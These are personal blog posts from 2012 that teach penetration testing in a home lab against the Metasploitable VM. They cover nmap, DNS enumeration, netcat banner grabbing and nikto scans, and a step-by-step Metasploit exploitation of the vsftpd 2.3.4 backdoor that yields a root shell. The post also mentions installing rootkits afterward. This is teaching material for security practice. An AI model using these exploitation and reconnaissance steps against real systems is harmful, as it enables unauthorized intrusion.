Tuesday, November 27, 2012

Gaining Access Using Metasploit

As promised in my Enumeration post, let's take a look at using Metasploit against our Metasploitable test server.  If you recall the output, there were many vulnerabilities we could attempt to exploit, but let's start off slow and tackle an easy one first.

Of course we will use Metasploit, but more specificity we will use the msfconsole interface.  Why not use the GUI?  Simply put, command line interfaces are easier to automate through scripts, and the goal of any good IT professional is to automate as much as their workload as possible.

So, from your BackTrack 5R2 machine, open a terminal and type:
msfconsole

Depending on the speed of your machine, it could take a minute or two before you see any movement.  This is even more prevalent if you are using a bootable version, so have patience.  Once you get a command prompt back, the easiest way to find an exploit is to search for it using the search command.  Let's pick on vsftpd and see what exploits are available.

msf > search vsftpd

Matching Modules
=================

Name     Disclosure Date  Rank    Description
----     ---------------  ----    -----------
Exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent  VSFTPD v2.3.4 Backdoor Command Execution

A backdoor, that sounds promising, let's use that one.  To do so enter in the following command: 
use exploit/unix/ftp/vsftpd_234_backdoor

You will note that your command prompt changes to include the exploit.  To see what options and available type: show options 
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unit/ftp/vsftpd_234_backdoor):

Name Current Setting Required  Description
---- --------------- --------  -----------
RHOST   yes   The target address
RPORT 21  yes   The target port

Exploit target:

Id  Name
--  ----
0   Automatic

To see what payloads are available use the show payloads command.
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payoads
==================

Name    Disclosure Date  Rank    Description
----    ---------------  ----    -----------
cmd/unix/interact       normal  Unix Command, Interact with Established Connection

Before we can exploit our target we need to set some options and pick a payload.  For this exploit it's fairly straight forward since we only have to set the target IP address and select the only payload we want (you'll note the target port number is already set to 21).

To set the target IP address enter:
set RHOST 192.168.10.107

To set the payload enter:
set payload cmd/unix/interact

And to exploit simply enter:
exploit

If all goes well you should receive some output that looks like this.
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.10.100:51396 -> 192.168.10.107:6200) at 2012-11-26 19:30:23 -0600

You will also note that you do not receive a command prompt back.  This is because you are now on your target system.  To prove this enter in a command like ifconfig. You should see the IP information for your target.  Since we are root, you are now free to do just about anything you want; such as create a user, install a rootkit, start/stop demons, etc.  To get back to the msfconsole interface while leaving the session running, use Ctrl+z.  If you exit or use the Ctrl+C combination you will close the session to your target.

Now this is a very simple exploit that is well documented, so we're definitely not breaking new ground here.  This is just an example of how we can use Metasploit to gain access after finding a vulnerable service during a scan.

Next we'll look a few more advanced options of Metasploit and start digging into some automation.

Until next time, thanks for reading.

Michael
Posted by No comments:

Monday, November 19, 2012

Enumeration - DNS

Given the volume of data I'm uncovering related to enumeration, I wanted to spend a bit more time talking about it.  In this post we'll focus on enumerating DNS.

DNS or Domain Name System, is really in place for us humans.  Computers work much better on numbers and us humans do much better with words, so we need a translator.

With that said there is a wealth of knowledge to be gleamed from DNS.  Here are a few techniques and tools I've been playing with, and I thought you would enjoy too.

Although not a very relevant attack today, one easy vector was to do a DNS zone transfer.  A zone transfer is legitimately used to replicate DNS records from one DNS server to another.  However legitimate, if miss configured it can be abused.

You can test to see if anonymous zone transfers are allowed by using the following command in BackTrack 5R2:  host -al domain_name.com (where domain_name.com is the target domain you are trying to transfer).

One tool I've used to enumerate DNS information is dnsmap.  Dnsmap allows you to automate the mining process by searching for a pre defined list of sub domains (of course you are free to add your own).

To do this on BackTrack5R2 execute :
 /pentest/enumeration/dns/dnsmap/dnsmap domain_name.com (where domain_name is the target you are trying to mine).  The output is clean and well organized for viewing on a screen (a bit clunky for scripting against I would think).

Another great tool I've been looking at is a python script called dnsrecon.py.  Dnsrecon has many more options then dnsmap, however with more options comes more configuration.  Like nmap, we need to sit down and figure out what we want before you start sending queries.  Here's an example I've been playing with:  dnsrecon.py -w -d domain_name.com (this will do a deep whois search and get you IP ranges for your target domain name).

Finally I want to take a quick look at a perl script named dnsenum.pl.  Dnsenum.pl has multiple options, much like dnsrecon.py, but it has one interesting option the other two tools lack; and that's Google scraping.  This allows you to automatically search Google for the domain name and gather those results too.

So in short, don't forget about DNS.  There are a lot of good tools to mine DNS and gain you valuable insight into that domain name.

Michael

Posted by No comments:

Monday, November 5, 2012

Enumeration

Let me start by stating there is a LOT of information related to enumeration.  Due to time restrictions I am going to focus this post on enumerating web servers.

Let's start by taking a deeper look at nmap.  Nmap has a lot of great features for this type of work, but before we start selecting options don't forget to keep the scope of the assessment in mind.  If you are limited by time you may need to speed up you scans, which of course could impact accuracy.  If accuracy can't be sacrificed then you may need to scale back what you scan for.  It's an interesting balancing act when it comes down to it.

Our basic nmap scan was: nmap -n -sT 192.168.10.0/24.  This is great for telling us what hosts and ports are listening, but what about what's behind those ports?  To examine that we need to add the -sV option.  The -sV option will gather the type and version of each service running on each port.  Having the type and version of a given service is going to make our jobs much easier when it comes to exploiting it.

Exercise:
If you're playing along at home, here's a good chance to enumerate the Metasploitable VM.  From BackTrack run the command: nmap -n -sT -sV 192.168.10.107 (where the IP address is the IP of the Metasploitable VM).  Doing so you should get some output like this:
Nmap scan report for 192.168.10.107
Host is up (0.014s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE              VERSION
21/tcp   open  ftp                  vsftpd 2.3.4
22/tcp   open  ssh                  OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet               Linux telnetd
25/tcp   open  smtp                 Postfix smtpd
53/tcp   open  domain               ISC BIND 9.4.2
80/tcp   open  http                 Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp  open  netbios-ssn          Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn          Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec                 netkit-rsh rexecd
513/tcp  open  login
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry          GNU Classpath grmiregistry
1524/tcp open  ingreslock?
2049/tcp open  nfs (nfs V2-4)       2-4 (rpc #100003)
2121/tcp open  ftp                  ProFTPD 1.3.1
3306/tcp open  mysql                MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql           PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc                  VNC (protocol 3.3)
6000/tcp open  X11                  (access denied)
6667/tcp open  irc                  Unreal ircd
8009/tcp open  ajp13                Apache Jserv (Protocol v1.3)
8180/tcp open  http                 Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port1524-TCP:V=5.61TEST4%I=7%D=11/5%Time=5097A08B%P=i686-pc-linux-gnu%r
SF:(NULL,17,"root@metasploitable:/#\x20")%r(GenericLines,73,"root@metasplo
SF:itable:/#\x20root@metasploitable:/#\x20root@metasploitable:/#\x20root@m
SF:etasploitable:/#\x20root@metasploitable:/#\x20")%r(GetRequest,827,"root
SF:@metasploitable:/#\x20<HTML>\n<HEAD>\n<TITLE>Directory\x20/</TITLE>\n<B
SF:ASE\x20HREF=\"file:/\">\n</HEAD>\n<BODY>\n<H1>Directory\x20listing\x20o
SF:f\x20/</H1>\n<UL>\n<LI><A\x20HREF=\"\./\">\./</A>\n<LI><A\x20HREF=\"\.\
SF:./\">\.\./</A>\n<LI><A\x20HREF=\"bin/\">bin/</A>\n<LI><A\x20HREF=\"boot
SF:/\">boot/</A>\n<LI><A\x20HREF=\"cdrom/\">cdrom/</A>\n<LI><A\x20HREF=\"d
SF:ev/\">dev/</A>\n<LI><A\x20HREF=\"etc/\">etc/</A>\n<LI><A\x20HREF=\"home
SF:/\">home/</A>\n<LI><A\x20HREF=\"initrd/\">initrd/</A>\n<LI><A\x20HREF=\
SF:"initrd\.img\">initrd\.img</A>\n<LI><A\x20HREF=\"lib/\">lib/</A>\n<LI><
SF:A\x20HREF=\"lost%2Bfound/\">lost\+found/</A>\n<LI><A\x20HREF=\"media/\"
SF:>media/</A>\n<LI><A\x20HREF=\"mnt/\">mnt/</A>\n<LI><A\x20HREF=\"nohup\.
SF:out\">nohup\.out</A>\n<LI><A\x20HREF=\"opt/\">opt/</A>\n<LI><A\x20HREF=
SF:\"proc/\">proc/</A>\n<LI><A\x20HREF=\"root/\">root/</A>\n<LI><A\x20HREF
SF:=\"sbin/\">sbin/</A>\n<LI><A\x20HREF=\"srv/\">srv/</A>\n<LI><A\x20HREF=
SF:\"sys/\">sys/</A>\n<LI><A\x20HREF=\"tmp/\">tmp/</A>\n<LI><A\x20HREF=\"u
SF:sr/\">usr/</A>\n<LI><A\x20HREF=\"var/\">var/</A>\n<LI><A\x20HREF=\"vmli
SF:nuz\">vmlinuz</A>\n<")%r(HTTPOptions,94,"root@metasploitable:/#\x20bash
SF::\x20OPTIONS:\x20command\x20not\x20found\nroot@metasploitable:/#\x20roo
SF:t@metasploitable:/#\x20root@metasploitable:/#\x20root@metasploitable:/#
SF:\x20")%r(RTSPRequest,94,"root@metasploitable:/#\x20bash:\x20OPTIONS:\x2
SF:0command\x20not\x20found\nroot@metasploitable:/#\x20root@metasploitable
SF::/#\x20root@metasploitable:/#\x20root@metasploitable:/#\x20")%r(RPCChec
SF:k,17,"root@metasploitable:/#\x20")%r(DNSVersionBindReq,17,"root@metaspl
SF:oitable:/#\x20")%r(DNSStatusRequest,17,"root@metasploitable:/#\x20")%r(
SF:Help,63,"root@metasploitable:/#\x20bash:\x20HELP:\x20command\x20not\x20
SF:found\nroot@metasploitable:/#\x20root@metasploitable:/#\x20")%r(SSLSess
SF:ionReq,51,"root@metasploitable:/#\x20bash:\x20{O\?G,\x03Sw=:\x20command
SF:\x20not\x20found\nroot@metasploitable:/#\x20");
MAC Address: 08:00:27:FD:06:4F (Cadmus Computer Systems)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.00 seconds

Amounts all the bad things running on this box, you'll find it's got Apache httpd 2.2.8 on port 80, Apache Jserve running on port 8090, and Apache Tomcat listening on 8180.  To enumerate the banners (also known as banner grabbing) we will use Netcat.  Run the following: nc -v 192.168.10.107 80 (where the IP address is the IP of the Metasploitable VM).  After entering the command hit the Enter and then type GET /HTTP/1.1 and then hit Enter a few more times (2 or 3 should be good).  Doing so you should get some output like this:
192.168.10.107: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.10.107] 80 (www) open
get / http/1.1

HTTP/1.1 400 Bad Request
Date: Mon, 05 Nov 2012 14:49:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at metasploitable.localdomain Port 80</address>
</body></html>

Another good tool to use against web servers is nikto.  Nikto will test the web server for dangerous files, directories and general mis-configuration.  To run a basic scan with nikto execute the following command from BackTrack5R2: perl /pentest/web/nikto/nikto.pl -h 192.168.10.107 (where the IP address is the IP of the Metasploitable VM).  Doing so you should get some output like this:
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.10.107
+ Target Hostname:    192.168.10.107
+ Target Port:        80
+ Start Time:         2012-11-05 06:24:17 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.19). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3233: /phpinfo.php: Contains PHP configuration information
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /phpMyAdmin/: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ 6474 items checked: 3 error(s) and 15 item(s) reported on remote host
+ End Time:           2012-11-05 06:30:07 (GMT-6) (350 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Next time we'll use this output to our advantage and see what we can do using Metasploit.  Until next time, thanks for reading.

Michael
Posted by 4 comments:

Thursday, November 1, 2012

Scanning

Now that we've built a cool playground we call a lab let's have a bit of fun. 

As we talked about in a previous post, footprinting is an important first step.  But now that the recon work is done we can move into scanning / enumeration.  Depending on who you talk to scanning & enumeration can either be put together or become their own topics.  For the sake of this blog I'm going to split them into two different posts.

Let's start by looking at scanning.  When it comes to scanning there are two different types, active and passive.  Active scanning is when you send out some type of prob (packet) to see if a host is online.  You are "actively" engaging the target.  This type of scanning can be done with a verity of tools, the most popular of which is nmap.  Nmap has been with us for years and is always improving, in fact it has so many features there's a book about it.  If you haven't already, I highly recommend checking it out.

But what if nmap isn't available?  This question was put to me recently and it made me think.  I've used nmap for so long I had forgotten about other options.  Well, believe it or not there are other tools out there.  After blowing the cobwebs out of my brain (and a quick research break) I came up with a short list of tools.

Scanner Linux Windows Mac OS-X Interface Example
nmap X X X CLI or GUI nmap -n -sn 192.168.10.0/24 (ping scan)
nmap -n -sT 192.168.10.0/24 (open port scan)
SuperScan - X - GUI It's a GUI
NetCat X X X CLI nc -zv 192.168.10.107 1-100
ScanLine - X - CLI sl -h 192.168.10.1-254 (ping scan)
sl -ht 1-100 192.168.10.1-254 (open port scan)
Cain - X - GUI It's a GUI

As always, this is not meant to be an all inclusive list (far from it).  These are just a few I thought people might enjoy trying out.

So what about passive scanning?  Passive scanning is when you don't actively send out packets but rather wait until clients talk on the network.  This type of scanning is generally less reliable due to several issues.  The 5 ton elephant here are those darn switches.  By design a switch only sends packets to the port they are destined for.  This makes listing in on conversations difficult, unless you employee something like ARP spoofing.

Even when we overcome any switching issues we'll have to take into account that we're only 'listening' to traffic.  Let's say there's an FTP server running on the same machine as the web server.  If no one ever uses FTP then we might not know it's there.

On the other hand, doing passive scanning can give you a great picture of how the network is used and where data might be stored.

I haven't done a lot of work with passive scanning, but I have played with NetworkMiner.  NetworkMiner is a Windows based tool that was ported to Linux/Unix.  You could also consider using packet capturing software such as Wireshark or TCPDump; of course there might be more work on the back end to figure out what hosts and ports are being used.  Hum, that's an interesting idea.  I wonder if you could make a network mapping extension to TCPDump?


Exercise
Since we've talked about a couple of different tools (and since we have a cool lab to play in) I would recommend trying each scanner in turn.  It's a good idea to understand what each tool is capable of before it's used on a production network.  I would also highly recommend looking through the plethora of options nmap offers.  It's also interesting to fire up Wireshark or TCPDump on your target machine so you can get an idea of what each scanner is actually doing.
Posted by No comments:
Subscribe to: Comments (Atom)